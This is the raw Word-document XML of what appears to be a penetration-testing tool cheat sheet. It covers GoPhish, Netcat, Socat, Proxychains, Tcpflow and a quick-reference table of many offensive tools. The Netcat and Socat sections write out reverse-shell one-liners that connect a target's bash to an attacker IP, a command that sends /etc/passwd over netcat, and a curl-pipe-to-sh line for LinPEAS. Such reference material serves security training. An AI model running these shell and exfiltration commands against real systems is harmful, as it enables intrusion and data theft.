          <w:color w:val="1e293b"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Download binary from https://github.com/gophish/gophish/releases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./gophish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Launches the GoPhish server. The admin UI is available at https://127.0.0.1:3333 (default credentials: admin/gophish — change immediately). The phishing server listens on port 80 by default.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./gophish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https://127.0.0.1:3333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Opens the GoPhish administration panel. Configure sending profiles, landing pages, email templates, user groups, and campaigns from this interface.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firefox https://127.0.0.1:3333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curl -k -H "Authorization: &lt;api-key&gt;" https://127.0.0.1:3333/api/campaigns/&lt;id&gt;/summary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Retrieves a JSON summary of campaign statistics — clicks, submissions, and open events — using the GoPhish REST API.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curl -k -H "Authorization: 0123456789abcdef" https://127.0.0.1:3333/api/campaigns/1/summary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Running employee phishing awareness training campaigns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Measuring click-through and credential submission rates across departments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Demonstrating phishing risk metrics to executive stakeholders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Testing security awareness program effectiveness over time</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Core network utilities for connectivity, tunneling, and traffic routing.</w:t>
      </w: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Netcat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Networking Utility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The "Swiss Army knife" of networking — a simple utility that reads and writes data across TCP/UDP connections, used for port scanning, file transfer, and reverse shells.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nc -lvnp &lt;port&gt;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Opens a listening TCP socket on the specified port. Use this to catch reverse shells or receive file transfers.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nc -lvnp 4444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nc &lt;host&gt; &lt;port&gt;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Opens a TCP connection to the specified host and port. Type interactively or pipe data to send it over the connection.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nc 192.168.1.100 4444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nc -lvnp &lt;port&gt; &gt; &lt;received-file&gt;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Listens on a port and redirects all received data into a file. Run this on the attacker side before the sender connects.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nc -lvnp 4444 &gt; received.txt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nc &lt;host&gt; &lt;port&gt; &lt; &lt;file&gt;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Connects to a listening nc and streams the contents of a local file over the connection.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nc 192.168.1.100 4444 &lt; /etc/passwd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bash -i &gt;&amp; /dev/tcp/&lt;attacker-ip&gt;/&lt;port&gt; 0&gt;&amp;1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Redirects bash stdin/stdout/stderr to a TCP connection back to the attacker. Run on the target after nc -lvnp is running on the attacker machine.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bash -i &gt;&amp; /dev/tcp/192.168.1.100/4444 0&gt;&amp;1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nc -zv &lt;host&gt; &lt;port-range&gt;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Performs a TCP port scan across a port range. -z uses zero I/O mode (no data sent), and -v reports whether each port is open.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nc -zv 192.168.1.1 20-80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Common Flags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Flag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-l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Listen mode — wait for an incoming connection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-v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Verbose output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-n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Disable DNS resolution — use raw IP addresses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-p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Local port number to listen on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-e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Execute a program after connecting (netcat-traditional only)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-z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Zero I/O mode for port scanning — do not send data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-u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Use UDP instead of TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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-w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="7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Connection timeout in seconds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Catching reverse shells from exploited targets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Transferring files to/from compromised hosts without elevated tools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Quickly testing whether a specific TCP port is open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Creating bind and reverse shell listeners for payload testing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Banner grabbing from network services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Socat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Networking Utility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="a16207"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  INTERMEDIATE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Bidirectional data relay that creates connections between two data channels — files, pipes, devices, or network sockets — enabling advanced tunnelling, port forwarding, and stable TTY shells.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socat TCP-L:&lt;port&gt; FILE:`tty`,raw,echo=0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Creates a listener that, when connected to by the target, produces a fully interactive PTY shell. The local terminal is set to raw mode so all keystrokes (including Ctrl+C and arrow keys) pass through correctly.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socat TCP-L:4444 FILE:`tty`,raw,echo=0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socat TCP:&lt;attacker-ip&gt;:&lt;port&gt; EXEC:/bin/bash,pty,stderr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Initiates a reverse connection from the target to the attacker, attaching bash to a PTY. Run this on the compromised target after the listener is started.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socat TCP:192.168.1.100:4444 EXEC:/bin/bash,pty,stderr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socat TCP-LISTEN:&lt;local-port&gt;,fork TCP:&lt;remote-host&gt;:&lt;remote-port&gt;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Listens on a local port and forwards all connections to a remote host and port. The fork option creates a new child process for each connection, supporting multiple simultaneous clients.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socat TCP-LISTEN:8080,fork TCP:192.168.1.50:80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socat TCP-L:&lt;port&gt; &lt; &lt;file&gt;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Listens on a port and streams a file over the connection when a client connects. On the receiving side run: socat TCP:&lt;host&gt;:&lt;port&gt; &gt; outfile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socat TCP-L:4444 &lt; /home/kali/payload.sh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Creating fully interactive TTY reverse shells that support interactive programs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Pivoting through compromised hosts via port forwarding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Encrypted tunnelling with SSL/TLS support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Relaying connections between non-routable network segments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Proxychains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Proxy &amp; Anonymisation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Forces any TCP connection made by a dynamically linked program through a chain of SOCKS4, SOCKS5, or HTTP proxies — enabling tool proxying through Tor or pivot hosts.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proxychains &lt;tool&gt; [tool-args]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Prefix any dynamically linked tool with proxychains to route its TCP connections through the configured proxy chain.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proxychains firefox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proxychains nmap -sT -Pn &lt;target&gt;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Performs a TCP Connect scan through the proxy chain. Must use -sT (connect scan) as SYN scans require raw sockets. -Pn skips ping as ICMP does not traverse SOCKS proxies.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proxychains nmap -sT -Pn 192.168.1.50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"socks5 127.0.0.1 9050" &gt;&gt; /etc/proxychains4.conf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Adds a SOCKS5 proxy entry to the proxychains configuration file. The format is: &lt;type&gt; &lt;host&gt; &lt;port&gt; [user] [pass].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# Edit /etc/proxychains4.conf and add:
socks5 127.0.0.1 9050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Routing attack tools through Tor for anonymisation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Tunnelling tools through a SOCKS proxy on a pivot host to reach internal networks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Bypassing IP-based access controls during external penetration tests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Chaining multiple proxies for additional obfuscation layers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1d4ed8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Tcpflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  —  Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a7f37"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="green"/>
          <w:highlightCs w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">  BEGINNER  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP stream reassembly tool that captures and reconstructs full application-layer conversations from live traffic or pcap files, saving each flow to a separate file.</w:t>
      </w:r>
    </w:p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Key Commands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Command / Syntax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Description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Example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tcpflow -i &lt;interface&gt;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Captures all TCP streams on the specified interface and writes each bidirectional flow to separate files in the current directory.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tcpflow -i eth0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tcpflow -r &lt;capture.pcap&gt;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Reads a previously saved pcap file and reconstructs all TCP conversations into separate flow files for analysis.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tcpflow -r capture.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3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tcpflow -i &lt;interface&gt; port &lt;port&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="40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Captures only TCP streams on the specified port, using BPF syntax to filter the capture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2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tcpflow -i eth0 port 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111827"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri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Extracting HTTP request/response bodies from captured traffic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Recovering files transferred over cleartext protocols (FTP, HTTP)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Analysing application-layer protocol exchanges without packet-level detail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color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-incident traffic analysis from saved pcap files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Reference Card</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Essential command cheatsheet — all tools at a glance.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Tool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Category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Key Command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d4ed8" w:val="clear"/>
          </w:tcPr>
          <w:p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Purpose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ls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 directory contents — the first command every Linux user learns.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cd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cd /path/to/directory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Change directory — navigate the Linux filesystem.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pwd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pwd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 working directory — shows exactly where you are in the filesystem.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mkdir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mkdir directory_name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Make directory — create new folders in the filesystem.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rm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rm filename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Remove files and directories — permanently deletes without a recycle bin. Use wi…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cp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cp source destination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Copy files and directories to a new location.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mv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mv old_name new_name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Move or rename files and directories.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cat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cat filename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Concatenate and display file contents — the quickest way to read a file.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less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less filename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Page through file contents interactively — better than cat for large files.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head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head filename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 the first lines of a file — useful for previewing file contents.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touch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touch filename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 empty files or update file timestamps.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chmod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chmod +x script.sh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Change file permissions — control who can read, write, and execute files.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chown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chown username filename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Change file ownership — assign files to a different user or group.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find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find /path -name "filename"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Search for files and directories by name, type, size, permissions, and more.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which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which command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Locate executable commands — find where a program lives in your PATH.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man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man command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Manual pages — the built-in documentation for every Linux command.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history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history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View and reuse your previous commands.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echo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"text"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 text or variable values to the terminal.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env / export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env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View and set environment variables that control program behavior.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alias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alias name='command'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 shortcuts for frequently used commands.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sudo / su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sudo command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Run commands as root or switch user — essential for privilege escalation underst…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whoami / id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whoami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 your current user identity and group memberships.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uname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uname -a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Print system information — kernel version, OS, and architecture.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date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date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 or set the current date and time.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clear / exit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clear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Clear the terminal screen and exit the shell.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passwd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Basics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passwd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Change user passwords.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grep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grep "pattern" filename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Search for patterns in text — the most-used text filtering tool in Linux.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awk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awk '{print $N}' filename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Powerful text processing — extract columns, perform calculations, and transform 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sed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sed 's/old/new/g'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Stream editor — find and replace, delete lines, and transform text non-interacti…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cut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cut -d":" -f1 filename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Extract specific columns or character ranges from text.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sort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sort filename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Sort lines of text alphabetically or numerically.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uniq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sort file | uniq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Remove or count duplicate adjacent lines. Always pair with sort first.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wc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wc -l filename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Count lines, words, and characters in files.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tr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tr 'a-z' 'A-Z'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Translate or delete characters in a stream of text.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tee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command | tee output.txt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Read from stdin and write to both stdout and a file simultaneously.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xargs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command | xargs another_command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Build and execute commands from stdin — pass lists as command arguments.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diff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diff file1 file2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Compare two files and show their differences.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file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file filename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Detect the real file type regardless of file extension.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strings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strings filename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Extract printable strings from binary files — quick static analysis.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xxd / hexdump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xxd filename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View files in hexadecimal format — essential for binary analysis.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base64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-n "text" | base64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Encode and decode data in Base64 format.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md5sum / sha256sum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md5sum filename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Calculate cryptographic checksums to verify file integrity.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tar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tar -czf archive.tar.gz directory/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Create and extract archive files — the standard Linux archiving tool.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gzip / zip / unzip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gzip filename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Compress and decompress files with gzip and zip formats.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wget / curl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wget URL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Download files and make HTTP requests from the command line.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nc (netcat)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nc -lvnp PORT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The "Swiss Army knife" of networking — connect, listen, and transfer data over T…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ssh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ssh user@hostname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Secure Shell — remote login and encrypted tunneling.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scp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scp localfile user@host:/remote/path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Secure copy — transfer files over SSH.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rsync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rsync -avz source/ destination/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Synchronize files locally or over SSH — only transfers changed files.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ps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ps aux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 running processes — essential for enumeration and process monitoring.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top / htop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top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Real-time process and resource monitoring.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kill / killall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kill PID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Terminate running processes by PID or name.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jobs / bg / fg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command &amp;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Manage background and foreground processes in the terminal.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crontab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crontab -e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Schedule recurring tasks — and a key persistence mechanism.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systemctl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systemctl status service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Manage system services and daemons with systemd.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df / du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df -h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Check disk space and directory sizes.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free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free -h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Display system memory (RAM) usage.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lsof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lsof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List open files — and every network connection is a file in Linux.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netstat / ss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ss -tulpn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Show network connections, listening ports, and routing tables.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ip addr / ifconfig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ip addr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View and configure network interfaces — find your IP address.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ping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ping -c 4 host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Test network connectivity to a host.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traceroute / tracepath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traceroute host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Trace the network path to a destination host.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nslookup / dig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nslookup hostname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DNS lookup tools — resolve hostnames and query DNS records.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iptables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Text &amp; File Processing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iptables -L -n -v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Linux firewall rules — control inbound and outbound network traffic.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Nmap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Information Gathering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nmap &lt;target&gt;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The industry-standard open-source network scanner used to discover hosts, servic…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Masscan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Information Gathering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masscan -p1-65535 &lt;target&gt; --rate=10000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The fastest Internet-scale port scanner, capable of scanning the entire IPv4 add…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theHarvester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Information Gathering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theHarvester -d &lt;domain&gt; -b google -l 100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 passive OSINT tool for gathering emails, subdomains, hosts, employee names, op…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Recon-ng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Information Gathering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marketplace install &lt;module-path&gt;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 full-featured web reconnaissance framework with a modular design similar to Me…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Maltego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Information Gathering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maltego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 visual link analysis and OSINT platform that maps relationships between people…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DMitry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Information Gathering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dmitry -w &lt;target&gt;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 UNIX/Linux command-line application for gathering as much information as possi…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DNSenum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Information Gathering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dnsenum &lt;domain&gt;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 multithreaded Perl script for enumerating DNS information about a domain, incl…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DNSrecon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Information Gathering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dnsrecon -d &lt;domain&gt; -t std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 powerful Python-based DNS enumeration script supporting multiple record types,…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Fierce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Information Gathering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fierce --domain &lt;domain&gt;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 DNS reconnaissance tool focused on locating non-contiguous IP space and hostna…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Whois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Information Gathering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whois &lt;domain&gt;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 command-line client for querying WHOIS databases to retrieve domain registrati…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Subfinder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Information Gathering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subfinder -d &lt;domain&gt;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 fast passive subdomain discovery tool that uses multiple data sources includin…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Amass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Information Gathering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amass enum -passive -d &lt;domain&gt; -o &lt;output&gt;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 comprehensive attack surface mapping tool from OWASP for in-depth DNS enumerat…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Netdiscover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Information Gathering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netdiscover -p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An active/passive ARP reconnaissance tool for discovering live hosts on a local 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ARP-Scan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Information Gathering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arp-scan --localnet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 fast and accurate ARP-based host discovery tool for identifying all active dev…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Shodan CLI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Information Gathering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shodan init &lt;API_KEY&gt;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The command-line interface for Shodan, the search engine for Internet-connected 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Nikto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Vulnerability Analysis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nikto -h &lt;host&gt;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An open-source web server scanner that performs comprehensive tests against web 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WPScan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Vulnerability Analysis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wpscan --url &lt;url&gt; -e u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 black-box WordPress vulnerability scanner that enumerates users, plugins, them…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Lynis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Vulnerability Analysis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lynis audit system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An open-source security auditing tool for Unix/Linux systems that performs in-de…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Nuclei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Vulnerability Analysis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nuclei -u &lt;url&gt; -t &lt;template-path&gt;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 fast, template-based vulnerability scanner from ProjectDiscovery that uses com…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OpenVAS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Vulnerability Analysis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gvm-start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 comprehensive open-source vulnerability assessment system (part of the Greenbo…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Burp Suite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Web Application Testing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burpsuite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Industry-standard integrated platform for web application security testing with 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sqlmap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Web Application Testing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sqlmap -u "&lt;url&gt;"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Open-source penetration testing tool that automates the detection and exploitati…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dirb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Web Application Testing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dirb &lt;url&gt;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Web content scanner that brute-forces directories and files on web servers using…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Gobuster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Web Application Testing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gobuster dir -u &lt;url&gt; -w &lt;wordlist&gt;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Fast directory, DNS, and virtual-host brute-forcing tool written in Go with mult…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ffuf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Web Application Testing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ffuf -u &lt;url&gt;/FUZZ -w &lt;wordlist&gt;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Fast web fuzzer written in Go using the FUZZ keyword as a flexible placeholder f…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wfuzz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Web Application Testing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wfuzz -c -w &lt;wordlist&gt; --hc 404 &lt;url&gt;/FUZZ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Python-based web application fuzzer supporting multiple injection points and adv…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WhatWeb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Web Application Testing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whatweb &lt;url&gt;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Web application fingerprinting tool that identifies technologies, CMS platforms,…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wafw00f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Web Application Testing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wafw00f &lt;url&gt;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Web Application Firewall detection and fingerprinting tool that identifies WAF p…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commix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Web Application Testing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commix --url="&lt;url&gt;"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Automated OS command injection testing tool that detects and exploits command in…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XSStrike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Web Application Testing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python3 xsstrike.py -u "&lt;url&gt;"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Advanced XSS detection suite with a built-in crawler, fuzzer, and intelligent pa…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John the Ripper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Password Attacks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john &lt;hashfile&gt;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Fast and versatile offline password cracker supporting hundreds of hash types wi…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Hashcat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Password Attacks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hashcat -m &lt;hash_type&gt; -a 0 &lt;hashfile&gt; &lt;wordlist&gt;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World's fastest GPU-accelerated password recovery tool supporting 350+ hash type…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Hydra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Password Attacks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hydra -l &lt;user&gt; -P &lt;passlist&gt; &lt;target_ip&gt; ssh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Fast and flexible online brute-force tool supporting over 50 protocols including…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Medusa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Password Attacks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medusa -h &lt;host&gt; -u &lt;user&gt; -P &lt;passlist&gt; -M ssh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Speedy, parallel, and modular login brute-forcer supporting many network service…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Crunch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Password Attacks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crunch &lt;min-len&gt; &lt;max-len&gt; &lt;charset&gt;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Wordlist generator that creates custom lists based on length ranges, character s…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CeWL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Password Attacks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cewl &lt;url&gt; -w &lt;outfile&gt;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Custom wordlist generator that spiders a website and extracts unique words to bu…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hash-identifier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Password Attacks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hash-identifier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Interactive tool that identifies the likely hash algorithm used to produce a giv…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Aircrack-ng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Wireless Attacks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aircrack-ng -b &lt;bssid&gt; &lt;capturefile&gt;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Complete 802.11 WEP and WPA/WPA2-PSK key cracking suite using captured IVs or 4-…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Airmon-ng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Wireless Attacks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airmon-ng check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Utility to enable and disable monitor mode on wireless interfaces and kill proce…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Airodump-ng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Wireless Attacks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airodump-ng &lt;monitor_interface&gt;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Raw 802.11 packet capture tool that lists nearby access points and associated cl…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Aireplay-ng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Wireless Attacks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aireplay-ng -0 &lt;count&gt; -a &lt;ap_bssid&gt; -c &lt;client_mac&gt; &lt;interface&gt;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Wireless packet injection and replay tool used to generate traffic for WEP crack…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Wifite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Wireless Attacks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wifite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Automated wireless auditing tool that combines aircrack-ng suite tools into a si…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Reaver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Wireless Attacks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reaver -i &lt;interface&gt; -b &lt;bssid&gt; -vv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WPS PIN brute-force tool that exploits a design flaw in the Wi-Fi Protected Setu…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Kismet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Wireless Attacks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kismet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Wireless network detector, sniffer, and intrusion detection system supporting 80…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Metasploit Framework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Exploitation Tools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msfconsole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The world's most widely used penetration testing framework, providing a curated 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Msfvenom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Exploitation Tools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msfvenom --list payloads | grep &lt;filter&gt;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Metasploit's standalone payload generator and encoder that creates shellcode, ex…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Searchsploit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Exploitation Tools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searchsploit &lt;product&gt; &lt;version&gt;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Command-line search utility for the Exploit-DB archive that lets you find and co…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BeEF XSS Framework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Exploitation Tools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cd /usr/share/beef-xss &amp;&amp; ./beef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Browser Exploitation Framework that hooks victim browsers via a JavaScript paylo…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RouterSploit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Exploitation Tools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rsf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Open-source exploitation framework dedicated to embedded devices — routers, came…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Wireshark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Sniffing &amp; Spoofing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wireshark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The world's most popular graphical network protocol analyser, capable of capturi…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Tcpdump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Sniffing &amp; Spoofing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tcpdump -i &lt;interface&gt;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The classic command-line packet analyser that captures network traffic matching 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Ettercap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Sniffing &amp; Spoofing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ettercap -G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Comprehensive man-in-the-middle attack suite supporting ARP poisoning, DNS spoof…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Bettercap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Sniffing &amp; Spoofing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bettercap -iface &lt;interface&gt;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Modern, modular MITM framework with a real-time web UI and interactive REPL that…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Responder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Sniffing &amp; Spoofing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responder -I &lt;interface&gt; -rdwv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LLMNR, NBT-NS, and MDNS poisoner that captures NTLMv1/v2 challenge-response hash…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Mitmproxy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Sniffing &amp; Spoofing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mitmproxy --listen-port &lt;port&gt;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Interactive TLS-capable HTTP/S proxy that intercepts, inspects, modifies, and re…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Arpspoof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Sniffing &amp; Spoofing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echo 1 &gt; /proc/sys/net/ipv4/ip_forward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Simple dsniff-suite utility that sends forged ARP replies to poison the ARP cach…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Meterpreter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Post Exploitation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sysinfo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Metasploit's advanced in-memory payload that provides an encrypted, extensible p…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Mimikatz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Post Exploitation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sekurlsa::logonpasswords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Windows credential extraction tool that dumps plaintext passwords, NTLM hashes, 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LinPEAS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Post Exploitation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curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh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Automated Linux privilege escalation enumeration script that highlights potentia…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WinPEAS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Post Exploitation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winPEASx64.exe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Windows privilege escalation enumeration tool that audits the local system for m…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Pspy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Post Exploitation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./pspy64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Unprivileged Linux process monitor that watches for new process executions in re…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Ghidra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Reverse Engineering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ghidraRun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NSA-developed open-source reverse engineering suite featuring a multi-architectu…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Radare2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Reverse Engineering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r2 &lt;binary&gt;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Portable, scriptable reverse engineering framework providing disassembly, debugg…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GDB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Reverse Engineering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gdb ./&lt;binary&gt;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GNU debugger for C/C++ and assembly programs, widely used for exploit developmen…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Objdump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Reverse Engineering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objdump -d &lt;binary&gt;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GNU binutils disassembler and object file analyser that extracts sections, heade…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Binwalk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Reverse Engineering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binwalk &lt;firmware.bin&gt;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Firmware analysis and extraction tool that scans binary files for embedded file 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Volatility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Forensics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volatility -f &lt;memory.dmp&gt; imageinfo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The industry-standard open-source memory forensics framework for extracting digi…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Foremost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Forensics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foremost -i &lt;disk.img&gt; -o &lt;output-dir&gt;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Console-based file carving utility that recovers deleted files from disk images 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ExifTool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Forensics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exiftool &lt;file&gt;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Platform-independent Perl library and command-line application for reading, writ…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Steghide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Forensics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steghide embed -cf &lt;cover-file&gt; -sf &lt;secret-file&gt; -p &lt;passphrase&gt;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Steganography tool that embeds and extracts hidden files within JPEG, BMP, WAV, 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dd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Forensics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dd if=&lt;source-device&gt; of=&lt;image.img&gt; bs=512 conv=noerror,sync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Low-level Unix utility for creating bit-for-bit copies of block devices, wiping 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Social-Engineer Toolkit (SET)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Social Engineering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setoolkit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Python-driven social engineering framework providing menu-guided attack vectors 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GoPhish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Social Engineering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./gophish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Open-source phishing simulation framework with a web dashboard for building, lau…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Netcat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Network Tools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nc -lvnp &lt;port&gt;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The "Swiss Army knife" of networking — a simple utility that reads and writes da…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Socat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Network Tools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socat TCP-L:&lt;port&gt; FILE:`tty`,raw,echo=0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Bidirectional data relay that creates connections between two data channels — fi…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Proxychains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Network Tools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proxychains &lt;tool&gt; [tool-args]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Forces any TCP connection made by a dynamically linked program through a chain o…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="18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Tcpflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="22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Network Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve">tcpflow -i &lt;interface&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%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val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">TCP stream reassembly tool that captures and reconstructs full application-layer…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2026-04-05T11:11:14.848Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-05T11:11:14.848Z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